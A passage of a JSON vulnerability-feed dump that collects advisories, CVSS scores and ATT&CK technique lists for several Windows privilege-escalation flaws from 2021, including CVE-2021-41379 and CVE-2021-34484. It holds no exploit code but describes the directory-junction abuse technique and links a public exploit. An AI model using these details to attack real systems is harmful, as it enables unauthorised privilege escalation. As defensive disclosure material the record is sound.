vulnerability, found a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability. 
He also made the proof-of-concept available to the public.\n\nAn unofficial micro patch has been released by 0patch and will be available for free until Microsoft releases an official patch for the vulnerability.\n\n#### Vulnerability Details\n\n\n\n#### Patch Link\n\n<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>\n\n#### References\n\n<https://threatpost.com/unpatched-windows-zero-day-privileged-file-access/176609/>\n\n<https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html>\n\n<https://www.techradar.com/sg/news/nasty-windows-10-vulnerability-gets-a-patch-but-not-from-microsoft>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-12-01T04:26:33", "type": "hivepro", "title": "Microsoft could not patch this vulnerability yet again", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-01T04:26:33", "id": "HIVEPRO:810C0A801A0950878F0BC43C27E1F429", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability-yet-again/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": 
"2021-11-26T17:20:32", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Microsoft-could-not-patch-this-vulnerability_TA202150-1.pdf>)\n\nMicrosoft released patches for 44 vulnerabilities on November 9th. CVE-2021-41379 was among them. However, installing this patch does not completely eliminate the vulnerability.\n\nAn [exploit](<https://github.com/klinix5/InstallerFileTakeOver>) for a new Windows zero-day local privilege elevation vulnerability that grants admin privileges in Windows 10, Windows 11, and Windows Server has been publicly disclosed by a security researcher, [Abdelhamid Naceri](<https://github.com/klinix5/>).\n\nCVE-2021-41379 is a privilege escalation vulnerability that allows an attacker with limited access on a compromised system to move laterally within the same network. All versions of Windows 10, Windows 11 and Windows Server are affected by this vulnerability.\n\nAfter examining Microsoft's fix, the security researcher who discovered this vulnerability discovered a bypass of the patch as well as a more powerful new zero-day privilege elevation vulnerability.\n\nThere are currently no workarounds for this vulnerability. Any attempt to directly patch the binary will result in a failure of the Windows Installer. 
We must wait for Microsoft to resolve this issue.\n\n#### Vulnerability Details\n\n\n\n#### References\n\n<https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-23T10:56:28", "type": "hivepro", "title": "Microsoft could not patch this vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-23T10:56:28", "id": "HIVEPRO:152F6F7B9557DB47003F4F65E73BCF44", "href": "https://www.hivepro.com/microsoft-could-not-patch-this-vulnerability/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-25T14:28:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. 
While a proof-of-concept has been available for some time now, it has not been actively exploited in the wild. This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the \"profext.dll\" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below:\n\n1. Update Windows 10 to the latest March 2022 patch.\n2. Create a free account in 0patch Central.\n3. Install and register the 0patch Agent.\n4. An automated micro-patching process will initiate to apply this patch.\n\n
Potential MITRE ATT&CK TTPs are:\n\nTA0042: Resource Development\nT1588: Obtain Capabilities\nT1588.006: Obtain Capabilities: Vulnerabilities\nTA0001: Initial Access\nT1190: Exploit Public-Facing Application\nTA0004: Privilege Escalation\nT1068: Exploitation for Privilege Escalation\nTA0005: Defense Evasion\nT1548: Abuse Elevation Control Mechanism\n\n#### Vulnerability Details\n\n#### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>\n\n<https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/>\n\n<https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html>", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T13:56:19", "type": "hivepro", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "modified": "2022-03-25T13:56:19", "id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "href": 
"https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. 
Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse 
Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses 
T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat 
Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": 
"HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:26:31", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Mobile Device Management Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-12-14T08:00:00", "id": "MS:CVE-2021-24084", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-07-28T21:46:37", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T08:00:00", "type": "mscve", "title": "Windows Installer Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-09T08:00:00", "id": "MS:CVE-2021-41379", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-41379", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:12", "description": "Windows User Profile Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows User Profile Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34484", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-05-27T15:51:57", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Device Management Enrollment Service. By creating a directory junction, an attacker can abuse the Device Management Enrollment Service to disclose the contents of arbitrary files. 
An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-10T00:00:00", "type": "zdi", "title": "Microsoft Windows Device Management Enrollment Service Directory Junction Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2021-02-10T00:00:00", "id": "ZDI-21-178", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-178/", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-05-23T15:46:59", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Windows Installer service. By creating a junction, an attacker can abuse the service to delete a file or directory. 
An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdi", "title": "Microsoft Windows Installer Service Link Following Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379"], "modified": "2021-11-11T00:00:00", "id": "ZDI-21-1308", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. 
An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:26:15", "description": "Windows Mobile Device Management Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": 
"2021-02-25T23:15:00", "type": "cve", "title": "CVE-2021-24084", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-24084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24084", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:44:41", "description": "Windows Installer Elevation of Privilege Vulnerability", "cvss3": 